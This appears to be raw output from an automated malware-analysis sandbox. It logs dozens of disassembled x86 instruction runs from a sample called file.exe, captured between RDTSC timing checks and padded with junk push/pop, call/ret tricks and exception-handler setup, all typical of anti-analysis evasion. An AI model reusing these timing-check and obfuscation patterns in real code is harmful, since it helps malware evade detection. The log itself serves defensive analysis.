Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A91 second address: A33A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A97 second address: A33A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33B68 second address: A33B72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33DD8 second address: A33DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A342BD second address: A342F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661CE75E93h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F661CE75E97h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F661CE75E86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A342F7 second address: A342FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A354CD second address: A354D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A354D2 second address: A354E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A365B5 second address: A36611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F661CE75E94h 0x0000000c nop 0x0000000d movzx edi, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F661CE75E88h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D38A2h] 0x00000034 mov esi, dword ptr [ebp+122D380Ah] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36611 second address: A36617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36617 second address: A3661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3702C second address: A37036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A37036 second address: A37074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F661CE75E86h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 cld 0x00000017 push 00000000h 0x00000019 mov si, bx 0x0000001c push 00000000h 0x0000001e jmp 00007F661CE75E8Ch 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36DDA second address: A36DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38608 second address: A3860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3860D second address: A38617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38308 second address: A3830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3830C second address: A38310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA47 second address: 9EDA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA4B second address: 9EDA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA4F second address: 9EDA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA57 second address: 9EDA61 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFC5 second address: A3CFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFD0 second address: A3CFD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFD7 second address: A3D029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2337h], ebx 0x00000010 xor dword ptr [ebp+122D2DA2h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F661CE75E88h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx ebx, cx 0x00000035 mov dword ptr [ebp+122D2390h], ebx 0x0000003b push 00000000h 0x0000003d mov ebx, dword ptr [ebp+122D232Bh] 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D029 second address: A3D034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F661D451436h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D034 second address: A3D063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F661CE75E86h 0x00000009 jmp 00007F661CE75E98h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F661CE75E86h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D063 second address: A3D067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D067 second address: A3D06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB9A second address: A3AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E035 second address: A3E098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F661CE75E88h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 cld 0x00000021 mov ebx, dword ptr [ebp+122D3806h] 0x00000027 push 00000000h 0x00000029 jmp 00007F661CE75E95h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D3616h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F661CE75E96h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EF73 second address: A3EFFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F661D451438h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D362Eh] 0x0000002d push 00000000h 0x0000002f mov di, 391Ch 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F661D451438h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov ebx, dword ptr [ebp+122D2D02h] 0x00000055 push ecx 0x00000056 xor di, C515h 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F661D451444h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EFFF second address: A3F006 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A400F9 second address: A400FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A400FF second address: A40187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F661CE75E88h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D2C44h], esi 0x0000002c popad 0x0000002d jp 00007F661CE75E92h 0x00000033 jp 00007F661CE75E8Ch 0x00000039 mov ebx, dword ptr [ebp+12458290h] 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D2E66h] 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F661CE75E88h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov bx, AA47h 0x00000067 xchg eax, esi 0x00000068 jo 00007F661CE75E94h 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F661CE75E86h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D23E second address: A3D24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A402B9 second address: A402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A402BF second address: A402C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4035E second address: A40362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A40362 second address: A40373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F661D45143Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4134A second address: A4134F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4134F second address: A41361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F661D451436h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42408 second address: A42437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F661CE75E8Ah 0x00000014 jmp 00007F661CE75E8Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A443CD second address: A443E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451441h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4557A second address: A45580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45580 second address: A45584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48419 second address: A48439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48439 second address: A4843F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A465B1 second address: A465B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A445B4 second address: A445C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A445C2 second address: A44635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, B167h 0x0000000e mov dword ptr [ebp+1245780Bh], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movzx ebx, di 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 sub dword ptr [ebp+12469E52h], ecx 0x0000002b mov eax, dword ptr [ebp+122D1729h] 0x00000031 mov dword ptr [ebp+12480B20h], eax 0x00000037 movzx edi, ax 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F661CE75E88h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 nop 0x0000005a pushad 0x0000005b jmp 00007F661CE75E8Eh 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A44635 second address: A4464B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F661D45143Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A485CF second address: A485DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A485DB second address: A4865E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F661D451438h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push ebx 0x00000029 xor ebx, 390F0FAEh 0x0000002f pop edi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+12469F33h], edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov dword ptr [ebp+122D295Eh], edi 0x0000004a mov eax, dword ptr [ebp+122D08E5h] 0x00000050 mov edi, edx 0x00000052 push FFFFFFFFh 0x00000054 call 00007F661D451446h 0x00000059 sub dword ptr [ebp+122D2A20h], ebx 0x0000005f pop edi 0x00000060 add bl, 00000030h 0x00000063 push eax 0x00000064 jg 00007F661D451448h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4865E second address: A48662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4A3E2 second address: A4A3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4A3EB second address: A4A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B5E5 second address: A4B5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F661D451436h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B5F8 second address: A4B60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D95 second address: A53D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D9B second address: A53D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D9F second address: A53DCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F661D45143Ch 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F661D451444h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53DCF second address: A53DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53DD5 second address: A53DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5407C second address: A540BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F661CE75E95h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F661CE75E90h 0x00000013 pop esi 0x00000014 jmp 00007F661CE75E93h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A540BE second address: A540C8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A540C8 second address: A540D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jbe 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A594AC second address: A594C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451440h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A595D7 second address: A595DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5967E second address: A59683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59683 second address: A59696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59696 second address: A5969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5969A second address: A596C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F661CE75E92h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jng 00007F661CE75E92h 0x00000019 je 00007F661CE75E8Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FD05 second address: A5FD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FD09 second address: A5FD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5EAF4 second address: A5EB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F661D451441h 0x0000000c jmp 00007F661D45143Bh 0x00000011 pop edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 jp 00007F661D451436h 0x0000001a je 00007F661D451436h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D45143Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F0D6 second address: A5F0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F243 second address: A5F247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F77C second address: A5F785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F785 second address: A5F790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F790 second address: A5F796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8E5 second address: A5F8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F0 second address: A5F8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F4 second address: A5F8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F8 second address: A5F8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
